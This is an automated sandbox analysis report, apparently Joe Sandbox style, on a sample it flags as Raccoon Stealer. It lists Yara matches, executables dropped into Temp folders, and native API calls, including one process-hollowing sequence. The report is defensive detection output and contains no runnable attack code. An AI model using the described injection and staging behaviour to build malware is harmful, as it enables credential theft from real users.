Yara detected Raccoon Stealer
Source: Yara match File source: 36.3.32BC.exe.48a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.32BC.exe.48a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.442845982.00000000048A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 32BC.exe PID: 5540, type: MEMORYSTR

System Summary:

barindex
.NET source code contains very large array initializations
Source: 8746.exe.7.dr, ue60aue64bue63aue60cue62cue60aue610ue60fue63aue63due63aue60bue61cue63cue623.cs Large array initialization: System.Byte[] ???????????????::???????????????: array initializer size 8704
Source: EDD.exe.7.dr, ???????????????.cs Large array initialization: System.Byte[] ???????????????::???????????????: array initializer size 8704
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E32A9 29_2_6A9E32A9
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9DE2C5 29_2_6A9DE2C5
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D4AEF 29_2_6A9D4AEF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9CFA2B 29_2_6A9CFA2B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9BEB8A 29_2_6A9BEB8A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94EBB0 29_2_6A94EBB0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94ABD8 29_2_6A94ABD8
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A968BE8 29_2_6A968BE8
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9C23E3 29_2_6A9C23E3
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93A309 29_2_6A93A309
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93AB40 29_2_6A93AB40
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A933360 29_2_6A933360
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A92B090 29_2_6A92B090
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A916800 29_2_6A916800
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D1002 29_2_6A9D1002
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93A830 29_2_6A93A830
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A948840 29_2_6A948840
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A932990 29_2_6A932990
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9399BF 29_2_6A9399BF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A934120 29_2_6A934120
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E2EF7 29_2_6A9E2EF7
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A936E30 29_2_6A936E30
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A99AE60 29_2_6A99AE60
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D67E2 29_2_6A9D67E2
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A942F70 29_2_6A942F70
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91EC9B 29_2_6A91EC9B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D4496 29_2_6A9D4496
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A932430 29_2_6A932430
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9435D0 29_2_6A9435D0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A910D20 29_2_6A910D20
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A932D50 29_2_6A932D50
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E1D55 29_2_6A9E1D55
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Code function: 33_2_004368C0 33_2_004368C0
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Code function: 33_2_0041EDBE 33_2_0041EDBE
PE file contains strange resources
Source: 192F.exe.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 192F.exe.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 192F.exe.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 192F.exe.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 192F.exe.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 192F.exe.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 192F.exe.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 75B0.exe.7.dr Static PE information: Resource name: RT_CURSOR type: GLS_BINARY_LSB_FIRST
Source: 75B0.exe.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 75B0.exe.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 75B0.exe.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 75B0.exe.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 75B0.exe.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: sfiueca.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: sfiueca.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: sfiueca.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: sfiueca.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: sfiueca.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: sfiueca.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: sfiueca.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: AdvancedRun.exe.27.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: AdvancedRun.exe.27.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Windows\explorer.exe Section loaded: taskschd.dll Jump to behavior
Uses 32bit PE files
Source: SkB6zJ6H3N.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 28.0.EDD.exe.810000.1.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 28.0.EDD.exe.810000.2.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 28.0.EDD.exe.810000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 27.0.5D4.exe.3b0000.3.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 27.0.5D4.exe.3b0000.1.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 31.0.319A.exe.d50000.1.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 31.0.319A.exe.d50000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 28.0.EDD.exe.810000.3.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 31.0.319A.exe.d50000.2.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 27.0.5D4.exe.3b0000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 31.0.319A.exe.d50000.3.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 27.0.5D4.exe.3b0000.2.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\AppData\Local\Temp\EDD.exe, type: DROPPED Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\AppData\Local\Temp\319A.exe, type: DROPPED Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\AppData\Local\Temp\8746.exe, type: DROPPED Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\AppData\Local\Temp\5D4.exe, type: DROPPED Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\AppData\Local\Temp\89D7.exe, type: DROPPED Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Code function: String function: 0041D0F0 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Code function: String function: 004212D0 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe Code function: String function: 0040B550 appears 50 times
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: String function: 6A96D08C appears 41 times
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: String function: 6A91B150 appears 128 times
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: String function: 6A9A5720 appears 76 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Code function: 4_2_0040185B Sleep,NtTerminateProcess, 4_2_0040185B
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Code function: 4_2_00401866 Sleep,NtTerminateProcess, 4_2_00401866
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Code function: 4_2_0040187A Sleep,NtTerminateProcess, 4_2_0040187A
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Code function: 4_2_0040163B NtMapViewOfSection, 4_2_0040163B
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Code function: 4_2_004018D3 NtTerminateProcess, 4_2_004018D3
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Code function: 4_2_00401884 Sleep,NtTerminateProcess, 4_2_00401884
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Code function: 4_2_00401888 NtTerminateProcess, 4_2_00401888
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Code function: 4_2_0040156A NtMapViewOfSection, 4_2_0040156A
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Code function: 4_2_004015DB NtMapViewOfSection,NtMapViewOfSection, 4_2_004015DB
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Code function: 4_2_004017EA Sleep,NtTerminateProcess, 4_2_004017EA
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Code function: 4_1_0040156A NtMapViewOfSection, 4_1_0040156A
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Code function: 4_1_004015DB NtMapViewOfSection,NtMapViewOfSection, 4_1_004015DB
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Code function: 4_1_0040163B NtMapViewOfSection, 4_1_0040163B
Source: C:\Users\user\AppData\Local\Temp\97A5.exe Code function: 20_2_0040185B Sleep,NtTerminateProcess, 20_2_0040185B
Source: C:\Users\user\AppData\Local\Temp\97A5.exe Code function: 20_2_00401866 Sleep,NtTerminateProcess, 20_2_00401866
Source: C:\Users\user\AppData\Local\Temp\97A5.exe Code function: 20_2_0040187A Sleep,NtTerminateProcess, 20_2_0040187A
Source: C:\Users\user\AppData\Local\Temp\97A5.exe Code function: 20_2_0040163B NtMapViewOfSection, 20_2_0040163B
Source: C:\Users\user\AppData\Local\Temp\97A5.exe Code function: 20_2_004018D3 NtTerminateProcess, 20_2_004018D3
Source: C:\Users\user\AppData\Local\Temp\97A5.exe Code function: 20_2_00401884 Sleep,NtTerminateProcess, 20_2_00401884
Source: C:\Users\user\AppData\Local\Temp\97A5.exe Code function: 20_2_00401888 NtTerminateProcess, 20_2_00401888
Source: C:\Users\user\AppData\Local\Temp\97A5.exe Code function: 20_2_0040156A NtMapViewOfSection, 20_2_0040156A
Source: C:\Users\user\AppData\Local\Temp\97A5.exe Code function: 20_2_004015DB NtMapViewOfSection,NtMapViewOfSection, 20_2_004015DB
Source: C:\Users\user\AppData\Local\Temp\97A5.exe Code function: 20_2_004017EA Sleep,NtTerminateProcess, 20_2_004017EA
Source: C:\Users\user\AppData\Roaming\cviueca Code function: 22_2_02C70110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess, 22_2_02C70110
Source: C:\Users\user\AppData\Roaming\cviueca Code function: 26_2_0040185B Sleep,NtTerminateProcess, 26_2_0040185B
Source: C:\Users\user\AppData\Roaming\cviueca Code function: 26_2_00401866 Sleep,NtTerminateProcess, 26_2_00401866
Source: C:\Users\user\AppData\Roaming\cviueca Code function: 26_2_0040187A Sleep,NtTerminateProcess, 26_2_0040187A
Source: C:\Users\user\AppData\Roaming\cviueca Code function: 26_2_0040163B NtMapViewOfSection, 26_2_0040163B
Source: C:\Users\user\AppData\Roaming\cviueca Code function: 26_2_004018D3 NtTerminateProcess, 26_2_004018D3
Source: C:\Users\user\AppData\Roaming\cviueca Code function: 26_2_00401884 Sleep,NtTerminateProcess, 26_2_00401884
Source: C:\Users\user\AppData\Roaming\cviueca Code function: 26_2_00401888 NtTerminateProcess, 26_2_00401888
Source: C:\Users\user\AppData\Roaming\cviueca Code function: 26_2_0040156A NtMapViewOfSection, 26_2_0040156A
Source: C:\Users\user\AppData\Roaming\cviueca Code function: 26_2_004015DB NtMapViewOfSection,NtMapViewOfSection, 26_2_004015DB
Source: C:\Users\user\AppData\Roaming\cviueca Code function: 26_2_004017EA Sleep,NtTerminateProcess, 26_2_004017EA
Source: C:\Users\user\AppData\Roaming\cviueca Code function: 26_1_0040156A NtMapViewOfSection, 26_1_0040156A
Source: C:\Users\user\AppData\Roaming\cviueca Code function: 26_1_004015DB NtMapViewOfSection,NtMapViewOfSection, 26_1_004015DB
Source: C:\Users\user\AppData\Roaming\cviueca Code function: 26_1_0040163B NtMapViewOfSection, 26_1_0040163B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_0040181C Sleep,NtTerminateProcess, 29_2_0040181C
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_00402406 NtEnumerateKey, 29_2_00402406
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_00401F25 NtQuerySystemInformation, 29_2_00401F25
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_00401828 Sleep,NtTerminateProcess, 29_2_00401828
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_00402431 NtEnumerateKey, 29_2_00402431
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_004017DA Sleep,NtTerminateProcess, 29_2_004017DA
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_004017F8 NtTerminateProcess, 29_2_004017F8
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_0040209A NtQuerySystemInformation, 29_2_0040209A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_004017A3 Sleep,NtTerminateProcess, 29_2_004017A3
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9598C0 ZwDuplicateObject,LdrInitializeThunk, 29_2_6A9598C0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959820 ZwEnumerateKey,LdrInitializeThunk, 29_2_6A959820
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959860 ZwQuerySystemInformation,LdrInitializeThunk, 29_2_6A959860
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9599A0 ZwCreateSection,LdrInitializeThunk, 29_2_6A9599A0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959600 ZwOpenKey,LdrInitializeThunk, 29_2_6A959600
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95967A NtQueryInformationProcess,LdrInitializeThunk, 29_2_6A95967A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959660 ZwAllocateVirtualMemory,LdrInitializeThunk, 29_2_6A959660
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959780 ZwMapViewOfSection,LdrInitializeThunk, 29_2_6A959780
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94D294 ZwQueryAttributesFile,RtlFreeHeap,ZwClose,RtlFreeHeap, 29_2_6A94D294
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95AA90 ZwQuerySystemInformationEx, 29_2_6A95AA90
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91429E RtlInitUnicodeString,ZwClose,LdrQueryImageFileKeyOption, 29_2_6A91429E
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A932280 RtlAcquireSRWLockExclusive,RtlDllShutdownInProgress,ZwWaitForAlertByThreadId,RtlAcquireSRWLockExclusive,ZwTerminateProcess, 29_2_6A932280
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95B280 ZwWow64DebuggerCall, 29_2_6A95B280
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94DA88 RtlAcquireSRWLockExclusive,RtlImageNtHeader,RtlAllocateHeap,ZwUnmapViewOfSection,ZwClose,RtlReAllocateHeap, 29_2_6A94DA88
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959AB0 ZwWaitForMultipleObjects, 29_2_6A959AB0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94E2BB ZwWaitForAlertByThreadId, 29_2_6A94E2BB
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A911AA0 RtlAllocateHandle,RtlReAllocateHeap,ZwAllocateVirtualMemory,ZwAllocateVirtualMemory,RtlAllocateHeap, 29_2_6A911AA0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91BAA0 RtlpLoadMachineUIByPolicy,RtlInitUnicodeString,ZwOpenKey,RtlpLoadMachineUIByPolicy,ZwClose, 29_2_6A91BAA0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A945AA0 TpSetPoolMaxThreads,ZwSetInformationWorkerFactory,RtlGetCurrentServiceSessionId,TpSetPoolMaxThreads, 29_2_6A945AA0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9152A5 RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwFsControlFile,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,ZwClose,RtlFreeHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection, 29_2_6A9152A5
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93FAD0 RtlAcquireSRWLockShared,RtlDllShutdownInProgress,ZwWaitForAlertByThreadId,RtlAcquireSRWLockShared,ZwTerminateProcess, 29_2_6A93FAD0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E8ADD RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A9E8ADD
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A1AD6 ZwFreeVirtualMemory, 29_2_6A9A1AD6
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95AAC0 ZwQueryWnfStateNameInformation, 29_2_6A95AAC0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95AAE0 ZwRaiseException, 29_2_6A95AAE0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959AE0 ZwTraceEvent, 29_2_6A959AE0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A915210 RtlGetCurrentDirectory_U,memcpy,RtlGetCurrentDirectory_U,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap, 29_2_6A915210
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91E216 RtlInitUnicodeString,ZwOpenKey,ZwEnumerateKey,ZwClose, 29_2_6A91E216
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E8214 RtlAcquireSRWLockExclusive,ZwSetInformationWorkerFactory,RtlReleaseSRWLockExclusive, 29_2_6A9E8214
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959A00 ZwProtectVirtualMemory, 29_2_6A959A00
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94B230 EtwEventWrite,ZwTraceEvent,RtlNtStatusToDosError,EtwEventWrite, 29_2_6A94B230
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959A30 ZwTerminateThread, 29_2_6A959A30
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A918239 RtlInitUnicodeStringEx,ZwQueryValueKey,RtlInitUnicodeStringEx,RtlPrefixUnicodeString,ZwEnumerateKey,ZwOpenKey,RtlInitUnicodeStringEx,ZwQueryValueKey,RtlFreeHeap,ZwClose,RtlAllocateHeap,RtlCompareUnicodeString,ZwClose,RtlFreeHeap,ZwClose, 29_2_6A918239
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A914A20 RtlGetCurrentServiceSessionId,RtlFreeHeap,ZwClose,RtlReleaseActivationContext,LdrUnloadDll, 29_2_6A914A20
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A4A28 ZwOpenKey,DbgPrintEx,ZwQueryValueKey,DbgPrintEx,DbgPrintEx,memcpy,ZwClose, 29_2_6A9A4A28
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95AA20 ZwQuerySecurityAttributesToken, 29_2_6A95AA20
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93A229 ZwAllocateVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwQueryVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlFillMemoryUlong,DbgPrint,DbgPrint,DbgPrint, 29_2_6A93A229
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959A50 ZwCreateFile, 29_2_6A959A50
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A919240 ZwClose,ZwClose,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlAcquireSRWLockExclusive,RtlFreeHeap, 29_2_6A919240
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A1242 ZwUnmapViewOfSection,ZwClose,ZwClose,ZwClose,ZwClose,ZwClose, 29_2_6A9A1242
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E8A62 RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A9E8A62
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A912B93 TpSetDefaultPoolMaxThreads,ZwDuplicateToken, 29_2_6A912B93
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95A390 ZwGetCachedSigningLevel, 29_2_6A95A390
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94939F RtlInitializeCriticalSectionEx,ZwDelayExecution, 29_2_6A94939F
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D138A memset,RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A9D138A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E9BBE RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A9E9BBE
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E8BB6 RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A9E8BB6
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95A3A0 ZwGetCompleteWnfStateSubscription, 29_2_6A95A3A0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D1BA8 RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A9D1BA8
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A944BAD RtlAcquireSRWLockExclusive,memset,ZwTraceControl,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,RtlFreeHeap,RtlAllocateHeap,RtlNtStatusToDosError,RtlFreeHeap, 29_2_6A944BAD
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A912BC2 ZwOpenThreadToken,ZwSetInformationThread,ZwClose, 29_2_6A912BC2
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959BF0 ZwAlertThreadByThreadId, 29_2_6A959BF0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9123F6 ZwClose,RtlFreeHeap, 29_2_6A9123F6
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A92A3E0 RtlFormatCurrentUserKeyPath,ZwQueryInformationToken,RtlLengthSidAsUnicodeString,RtlAppendUnicodeToString,RtlConvertSidToUnicodeString,RtlFreeUnicodeString, 29_2_6A92A3E0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D131B RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A9D131B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A914B00 TpCallbackMayRunLong,TpCallbackMayRunLong,ZwSetInformationWorkerFactory, 29_2_6A914B00
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A945306 ZwReleaseKeyedEvent, 29_2_6A945306
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959B00 ZwSetValueKey, 29_2_6A959B00
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A919335 ZwClose,ZwClose, 29_2_6A919335
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E8B58 RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A9E8B58
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A943B48 ZwClose,ZwClose, 29_2_6A943B48
